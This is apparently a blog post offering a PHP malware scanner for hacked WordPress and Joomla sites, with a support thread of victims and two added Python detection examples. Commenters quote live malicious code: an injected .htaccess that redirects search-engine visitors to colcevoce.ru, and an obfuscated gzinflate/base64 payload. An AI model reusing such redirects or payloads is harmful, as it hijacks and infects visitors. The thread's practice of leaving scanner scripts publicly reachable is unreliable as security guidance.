This Malware Scanner script scans files and detects possible malware code. The script returns a list of possibly infected files. Each file is labelled with one of (eval, c99madshell, & long_text) together with a portion of the matched code. The script matches the word “eval(…)”, the sequence <?php $md5=”…”; $wp_salt=”…”; … (also known as ‘c99madshell’), and a long text such as “FEKS2121asFklMn83kUgdlf/sDkn12L+…”, because I believe these are potential malware code.
When you’re done running the malware scanner script, double-check the results. Do not delete or clean the files immediately: the script also matches clean files as long as they contain one of the 3 potential hacker code patterns. So, please be careful.
Below are the sample results:
1. ./website.com/wp-includes/js/tw-sack.dev.js – eval – eval(this.response
- File – ./website.com/wp-includes/js/tw-sack.dev.js
- Label – eval
- Small portion of Matched Code – eval(this.response
- Not a hacker code
2. ./website2.com/system/libs/65d1.php – long_text – UeZTUf77n6yg8roYttj54AztjS3gfP7FhotwRGOTO9CKDOJeAr
- File – ./website2.com/system/libs/65d1.php
- Label – long_text
- Small portion of Matched Code – UeZTUf77n6yg8roYttj54AztjS3gfP7FhotwRGOTO9CKDOJeAr
- I checked the file and confirmed it was a hacker’s code.
Download Malware Scanner
To use the script you can run it on your favorite browser or using a command line (recommended):
$ time php scanner_2.6.php >> scanner_log 2>&1 | tail -f scanner_log
This command runs scanner_2.6.php, appends its output (including any PHP warnings) to the scanner_log file, and follows the log as it grows.
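As an added illustration of the three labels described above, here is a small Python re-implementation of the scan; it is not the post's own PHP scanner (which is only available via the download link), the three regexes are my assumptions about what that script matches, and the files it scans are constructed samples.

```python
import os, re, shutil, tempfile

SIGNATURES = {  # assumed regexes for the three labels; the original PHP patterns are not on the page
    "eval": re.compile(r"\beval\s*\("),
    "c99madshell": re.compile(r'<\?php\s*\$md5\s*=\s*"[^"]*";\s*\$wp_salt\s*=\s*"[^"]*";'),
    "long_text": re.compile(r"[A-Za-z0-9+/]{40,}={0,2}"),  # long base64-looking run
}

def scan_text(text, snippet_len=50):
    """Return [(label, snippet)] for each signature that matches; [] for a clean file."""
    hits = []
    for label, pattern in SIGNATURES.items():
        m = pattern.search(text)
        if m:  # report a portion of the matched code, as in the sample results
            hits.append((label, text[m.start():m.start() + snippet_len].splitlines()[0]))
    return hits

def scan_tree(root, exts=(".php", ".js", ".txt")):
    """Walk root; return sorted [(path, label, snippet)], skipping unreadable files."""
    results = []
    for dirpath, _, filenames in os.walk(root):
        for name in (n for n in filenames if n.endswith(exts)):
            path = os.path.join(dirpath, name)
            try:
                with open(path, encoding="utf-8", errors="replace") as fh:
                    text = fh.read()
            except OSError:
                continue  # unreadable file: skip it, do not abort the scan
            results.extend((path, label, snip) for label, snip in scan_text(text))
    return sorted(results)

def demo():
    """Constructed sample tree: benign eval, c99madshell header, long_text, and a clean file."""
    samples = {
        "js/tw-sack.dev.js": "var r = eval(this.response);\n",
        "libs/shell.php": '<?php $md5="ab12"; $wp_salt="cd34"; echo "hi";\n',
        "libs/65d1.php": '<?php $p = "SampleLongRunOfBase64LikeChars0123456789abcdefgh";\n',
        "clean.php": "<?php echo 'hello';\n",
    }
    root = tempfile.mkdtemp()
    try:
        for rel, body in samples.items():
            os.makedirs(os.path.join(root, os.path.dirname(rel)), exist_ok=True)
            with open(os.path.join(root, rel), "w", encoding="utf-8") as fh:
                fh.write(body)
        return [(os.path.relpath(p, root), l, s) for p, l, s in scan_tree(root)]
    finally:
        shutil.rmtree(root)
```

Note that the benign tw-sack.dev.js sample is still reported, exactly as the post warns: the labels mark candidates for review, not confirmed infections.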
Malware Cleaner
Hi Paolo
First up, thanks for your great work with this script.
When I run it via command line or browser, I get this:
../infected/################################################################################
Found Files
Summary. You can take a better look on files that matches a potential hack script.
Then in my error log I see:
[28-Feb-2012 20:41:34] PHP Warning: opendir(../infected/) [function.opendir]: failed to open dir: No such file or directory in /*****/*****/public_html/barcodeinfo/scanner_2.3.php on line 83
[28-Feb-2012 20:41:35] PHP Warning: Invalid argument supplied for foreach() in /***/*****/public_html/barcodeinfo/scanner_2.3.php on line 57
Any ideas?
thanks
Anthony
Oh! Sorry about that Anthony, I have fixed it. I have now changed $root="./"; on line 25. Let me know your thoughts about the scanner. Thanks for using it.
Regards,
Paolo
Paolo
I have some malware issues going on but I’m not sure how to fix. I run the cleaner and it works but the malware returns again so I don’t think that I’m getting to the root of the issue. I ran the scanner but am not sure what I’m looking for. Can you please help or point me in the right direction?
These are always the infected files found by the cleaner
./index.php
./wp-admin/index.php
./wp-content/index.php
http://ericpostonline.com/scanner_2.3.php
Hi Brian,
We need to find the script that creates the malware code.
The scan result can help me find it.
I’ll run the scanner on your site and check the result.
Let you know.
Paolo
Great work Paolo... This is a really useful plugin.
The best one indeed.
Thank you
but this isn’t a plugin. It’s just a simple script
Have a great day!
The scanner code is not working for me. It stays there for a while like it is doing something, but after a while it says the server is busy.
Total newb here, pls be patient
And thank you very much for this!
Hello Rulex,
Thanks for using my code. Can you check if there’s a scanner_log in the directory where scanner_2.4.php is located?
Actually, the scanner should output directories or files as it scans your server.
If it doesn’t show try this command :
Also, when it’s done, can you send the scanner_log to info@php-beginners.com, because as of now I am the only one who can understand the scanner_log, but I am still working on upgrading it.
Let me know. Thanks.
Paolo
Hi Paolo,
I ran the script on my site and am having the same issue as the guy above. I don’t know what I am looking for and am not sure if the malware is cleaned, because the malware is still on the site. Here is the site:
http://thelauryndoll.com/scanner_2.4.php. I will email you as well. Thanks.
Hello Teresa,
Thanks for using the malware scanner. I’ll run it now and see what I find.
Thanks. Keep you posted.
Regards,
Paolo
Hi Teresa,
I just finished running the scanner, I found these 12 suspicious files:
2. ./wp-signup.php
-eval – eval(base64_decode(“ZXZhbChiYXNlNjRfZGVjb2RlKCJaWF
76. ./wp-content/themes/headway/library/api/api-child-theme.php
-eval – eval(base64_decode(“ZXZhbChiYXNlNjRfZGVjb2RlKCJaWF
108. ./wp-content/themes/DailyNotes/page-gallery.php
-timthumb vulnerability – timthumb
109. ./wp-content/themes/DailyNotes/changelog.txt
-timthumb vulnerability – timthumb
-timthumb vulnerability – Timthumb
110. ./wp-content/themes/DailyNotes/page-template-portfolio.php
-timthumb vulnerability – timthumb
111. ./wp-content/themes/DailyNotes/single.php
-timthumb vulnerability – timthumb
112. ./wp-content/themes/DailyNotes/page-blog.php
-timthumb vulnerability – timthumb
115. ./wp-content/themes/DailyNotes/epanel/custom_functions.php
-timthumb vulnerability – timthumb
120. ./wp-content/themes/DailyNotes/includes/entry.php
-timthumb vulnerability – timthumb
121. ./wp-content/themes/DailyNotes/includes/entry2.php
-timthumb vulnerability – timthumb
122. ./wp-content/themes/DailyNotes/includes/functions/troubleshooting.php
-timthumb vulnerability – timthumb
-timthumb vulnerability – Timthumb
123. ./wp-content/themes/DailyNotes/includes/functions/installation.php
-timthumb vulnerability – TimThumb
I really got the feeling that the main malware script is in ./wp-signup.php
Please send the files to me at info@php-beginners.com
Let me know. Thanks.
Paolo
Hi Paolo, can I use the script to scan a Joomla website?
Thank you.
Cesar
Yes Cesar, you can use it on Joomla, just send me the scan result if you don’t know how to read it.
Thanks for using it.
Paolo
I don’t know anything about php and would like to use this scanner. I know basic WP installs but that is it. My sites have been hit with a JS Redirect trojan. My host company found malware on a few sites and cleaned those. I’m blocked by my antivirus from visiting a couple other sites still. Do you have steps for a complete newb on how to use your scanner?
Thanks,
Wayne
Hi Wayne,
I’ll create one for you Wayne, don’t worry.
What hosting are you using? What’s your website URL?
Can you access your server using “Shell Access”? If you don’t have any, please ask your hosting support about “Shell Access”.
Keep you posted.
Thanks.
Paolo
Thanks for the script but I get timeouts
I am on Dreamhost.com but live in Germany…
http://www.nowayland.com/cleaner28.php
http://www.nowayland.com/scanner26.php
I have 5 WordPress sites on there and one directs ONLY in Safari oddly… Can you help? I have reinstalled wordpress but not removed old themes or old plugins but updated most…
Hello,
Did you try to run the scanner on the CLI?
Paolo
Hi Paolo, thanks for the great work.
I’ve been infected by an old installation of Joomla (almost sure) that I’m not using anymore. But they infected all my server’s Drupal installations, changing the .htaccess files with the code at the end of my message.
It’s possible to run the script in a drupal installation?
Let me explain my scenario
I ran your cleaner, but about 30 min after, the .htaccess had been modified again.
Any ideas??? I’m run of it.
Any help It will be appreciated.
P.S. Sorry for my English.
Best regards!!
RewriteEngine On
RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|baidu|youtube|wikipedia|qq|excite|
altavista|msn|netscape|aol|hotbot|goto|infoseek|mamma|alltheweb|lycos|search|
metacrawler|bing|dogpile|facebook|twitter|blog|live|myspace|mail|yandex|rambler|ya|
aport|linkedin|flickr|nigma|liveinternet|vkontakte|webalta|filesearch|yell|openstat|
metabot|nol9|zoneru|km|gigablast|entireweb|amfibi|dmoz|yippy|search|walhello|
webcrawler|jayde|findwhat|teoma|euroseek|wisenut|about|thunderstone|ixquick|terra|
lookle|metaeureka|searchspot|slider|topseven|allthesites|libero|clickey|galaxy|
brainysearch|pocketflier|verygoodsearch|bellnet|freenet|fireball|flemiro|suchbot|acoon|
cyber-content|devaro|fastbot|netzindex|abacho|allesklar|suchnase|schnellsuche|
sharelook|sucharchiv|suchbiene|suchmaschine|web-archiv)\.(.*)
RewriteRule ^(.*)$ http://colcevoce.ru/infinity?8 [R=301,L]
RewriteCond %{HTTP_REFERER} ^.*(web|websuche|witch|wolong|oekoportal|t-online|freenet|
arcor|alexana|tiscali|kataweb|orange|voila|sfr|startpagina|kpnvandaag|ilse|wanadoo|
telfort|hispavista|passagen|spray|eniro|telia|bluewin|sympatico|nlsearch|atsearch|
klammeraffe|sharelook|suchknecht|ebay|abizdirectory|alltheuk|bhanvad|daffodil|
click4choice|exalead|findelio|gasta|gimpsy|globalsearchdirectory|hotfrog|jobrapido|
kingdomseek|mojeek|searchers|simplyhired|splut|the-arena|thisisouryear|ukkey|uwe|
friendsreunited|jaan|qp|rtl|search-belgium|apollo7|bricabrac|findloo|kobala|limier|
express|bestireland|browseireland|finditireland|iesearch|ireland-information|kompass|
startsiden|confex|finnalle|gulesider|keyweb|finnfirma|kvasir|savio|sol|startsiden|
allpages|america|botw|chapu|claymont|clickz|clush|ehow|findhow|icq|goo|
westaustraliaonline)\.(.*)
RewriteRule ^(.*)$ http://colcevoce.ru/infinity?8 [R=301,L]
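A check for the .htaccess pattern in the message above, added here as an example that is not part of the post or its scanner: it flags RewriteRule lines that externally redirect visitors matched by a HTTP_REFERER condition, which is how a sysadmin can sweep many installations for the same injection. The sample .htaccess is constructed in the same shape, with a placeholder target host.

```python
import re
from urllib.parse import urlparse

COND = re.compile(r"^\s*RewriteCond\s+%\{HTTP_REFERER\}\s+(\S+)", re.I)
RULE = re.compile(r"^\s*RewriteRule\s+\S+\s+(\S+)(?:\s+\[([^\]]*)\])?", re.I)

def find_referer_redirects(htaccess_text, own_hosts=()):
    """Flag RewriteRules that send referer-matched visitors to a host not in own_hosts."""
    findings, conds = [], []  # conds: RewriteCond lines waiting for their RewriteRule
    for lineno, line in enumerate(htaccess_text.splitlines(), 1):
        c = COND.match(line)
        if c:
            conds.append((lineno, c.group(1)))
            continue
        r = RULE.match(line)
        if not r:
            continue  # comments and other directives: pending Conds still apply to the next Rule
        target, flags = r.group(1), r.group(2) or ""
        host = urlparse(target).hostname  # None for a local target such as /index.php
        if conds and host and host not in own_hosts and re.search(r"(^|,)R(=\d+)?(,|$)", flags):
            findings.append({
                "line": lineno,
                "target_host": host,
                "cond_lines": [n for n, _ in conds],
                "referer_terms": sum(p.count("|") + 1 for _, p in conds),  # size of the referer list
            })
        conds = []  # a RewriteRule consumes the preceding RewriteCond block
    return findings

# Constructed .htaccess in the shape of the injected one above: a list of search-engine and
# social-site referers in front of an external 301. The target host is a placeholder.
SAMPLE_HTACCESS = """\
RewriteEngine On
RewriteCond %{HTTP_REFERER} ^.*(google|yahoo|bing|facebook|twitter|yandex)\\.(.*)
RewriteRule ^(.*)$ http://redirect-target.invalid/infinity?8 [R=301,L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteRule . /index.php [L]
"""
```

Because the rule only fires for visitors arriving from a search engine, the owner opening the site directly sees nothing wrong, which matches what several commenters on this page describe.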
Hello Enric,
You need to find the file that is responsible for writing
the malware script to your server again.
You can do it by running a malware scanner, you can download it here:
http://www.php-beginners.com/wordpress-hack-malware-scanner.html#id-download
and send the scan result to me @ info@php-beginners.com.
Paolo
Ok, thanks Paolo,
There are a lot of Drupal installations, but fortunately the problem is the same.
I’ll leave running the script all night.
I had tried to search manually the f… file, but with no results
Thanks in advance!!
Enric
I had a blog where the hackers injected black hat links in my content. The links could only be seen in the code and not on the visual part of the blog. I found out it was hacked when I looked up the most used keywords in Google webmaster tools. I knew I never used keywords like viagra and other pharmacy products, still according to GWT they were the most used keywords on my site. I did not use the timthumb.php script, and I am not quite sure where the hackers got in. It may be the files on the server had write access and the server was shared.
Hi Paolo!!,
the script is still working. A lot of directories.
Tomorrow I’ll send to you.
Thanks
Hi, Paolo,
Thanks for the scripts. My site has been struggling with hackers for months, and I have no idea how to solve it other than to keep asking the host Q&A to restore... I guess your work can help me get rid of it completely... but the problem is that the scanning is running very slowly on my computer, so no result showed. Also, I believe even if the result can show, I can’t read it. I sincerely ask you to help me~~ Thank you...
Hello Angela,
Don’t worry just send the result to me @ info@php-beginners.com
I’ll read it for you. Just let me know. Thanks.
Paolo
I think my sites (22 Joomla installations on one server). I have run your cleaner and scanner. But I have a problem finding the source of my problem.
Hello Kenneth,
Just send the scan logs to me. Maybe that way we can find the main malware script.
Let me know
Paolo,
I sent you an email at info@php-beginners.com.
I’m unable to run the scanner_2.6.php script from any browser. The email contains info that may help.
I hope this was ok…. just desperate to fix this problem!
Regards,
Pinky
Hi Paolo, I’ve sent you an email with a scanner log. If you could help I’d really appreciate it, as this has been driving me mad for weeks.
Best,
John
Thank you Paolo!
I have replaced all the garbage code with your help and changed the FTP details.
After 3-4 days this code came back again. What should I do?
Hi Vibha,
Can you please try to scan your site. Download my malware scanner here:
http://www.php-beginners.com/wordpress-hack-malware-scanner.html#id-download
Run and send the scan result to me at info@php-beginners.com
Let me know. Paolo
Thanks for reply.
I found this code in all index files.
* ./wp-content/themes/twentyeleven/index.php
-eval – eval(base64_decode(‘JGlwPSRfU0VSVkVSWyJSRU1PVEVfQU
* ./index.php
-eval – eval(base64_decode(‘JGlwPSRfU0VSVkVSWyJSRU1PVEVfQU
And I found one cgi_bin folder under root which has a yhqti.php file with garbage code.
There is also one log file generated on root because of the virus, which has all visiting users’ IP addresses.
ah! I see. just continue the scan and send the result to me.
We need to find the file that is responsible for rewriting the malware codes again.
Hello Paolo, my site appears to have the eval64 codes in the main header. I deleted all the codes and they appeared again! I have sent the results to your email, please review the codes..
Hello Viptor,
I just replied to your email. Please check it out. Thanks.
Hey,
Thanks for the scanner, but can’t you explain how to use your scanner for people who don’t know about command lines and shell whatever? Is that so difficult? What do I have to do? Upload the file and start it somehow?! How? Thank you.
Hello Tofe,
Actually, you can run it on your favorite browser.
example:
http://www.yourwebsite.com/scanner_X.X.php
Hello Paolo, thanks for your program. I am having the malware problem in my wp header.php file. I cleaned it 100 times but it keeps coming back. I made a scan with your code but the result is too long and complicated, and it says 140 possible malware codes found. Is there any way that you can help me?
Thanks
Hello Abrek,
Thanks for using my script. Just send the scan result to me at info@php-beginners.com
I’ll analyze the result for you
Let me know.
I sent the mail just now. Thank you very much!
I am now stumped. I had 3 sites hacked. I think I have 2 fixed, but on one the code in the header.php keeps coming back. I am not that good with code. The code that keeps coming back is
#c3284d#
echo(gzinflate(base64_decode(“JY5NDsIgEIX3Jr0DmU11U6ILFwp4CS9AKcIohYYOVm8vtbuXL+9PzCbjRIy+k5VA9kP8qd96o6Ca3ZBMGW2kbslIdt8KfGQ9WjZnI8ETTRfO+6DNC8vY5cIxdsbh7XgGFqtPwn1BIpuB1c4UAkYnQRdKwP5FfcqDzRJiBTqgixJMnVsD3qLzJOEEbMGB/KqU4NsB1R6uzU7w7an6AQ==”)));
#/c3284d#
I have all three programs on the site
http://www.tenofthebest.net/scanner_2.6.php
http://www.tenofthebest.net/cleaner-cli_2.10.php
http://www.tenofthebest.net/cleaner_2.10.php
the cleaner says no infected but that line keeps coming back. I also have tried the scanner but not sure what I am looking for. Everything I look at seems to belong but I am not a coder.
I really would appreciate if you could give me a tip on how to find the problem with the scanner because I am sure it will happen again and I will need to try and figure out how to fix on another site.
Thanks,
Jeff
hopefully I got it.
Hello Jeff,
There are certain malware signatures that the cleaner cannot recognize, maybe it’s a new malware signature. We need to run the malware scanner; it’s at:
http://www.tenofthebest.net/scanner_2.6.php
and send the scan log to me at info@php-beginners.com
I’ll let you know.
Paolo
Hello Paolo,
I have uploaded your malware scanning script on my server. My site works fine on direct access, but if I access it through a search engine it redirects to an iframed page. I had my hosting company scan it, but they failed to fix it and messed up my website’s layout.
this is the site: http://reviewjuicers.com/scanner_2.6.php where i have added the script
Hello Taimoor,
Oh I see, let’s fix your site. Please run the scanner and send the result to me at info@php-beginners.com
Let me know.
Hello Paolo,
First of all, thank you for helping out so many people. I hesitate to ask for your assistance when I see how much you have already done. I’ve read through the posts above and I have a question about whether I’ve used your scripts correctly.
My site is causing malware warnings for some of its users. I am concerned that if I don’t fix it soon that Google will blacklist it. We are a community-based photography festival in Chicago and have just launched our yearly program this week. I’m in trouble!
I ran the scanner at http://www.filterfestival.com/scanner_2.6.php and it reported 189 suspect files. I then ran the cleaner at http://www.filterfestival.com/cleaner_2.10.php and it reported 0 infected files.
Does this mean that your script was successful?
Thank you again for your help.
Jeff
Hi Paolo,
First off, thanks for creating this. I have uploaded scanner_2.6.php to the root folder of my website and I get the following error when trying to run it:
Error 355 (net::ERR_INCOMPLETE_CHUNKED_ENCODING): The server unexpectedly closed the connection.
Can you run the scan for me or give me some pointers? Thanks in advance!
http://www.texaselectricbroker.com/scanner_2.6.php
Best regards,
Chris
Hello Paolo, great work with the script! I sent you an email with the log file I got from the scan… let me know if you’re available to help!
Thanks
Fernando
Hi Paolo
I have request few and need your help?
Cosy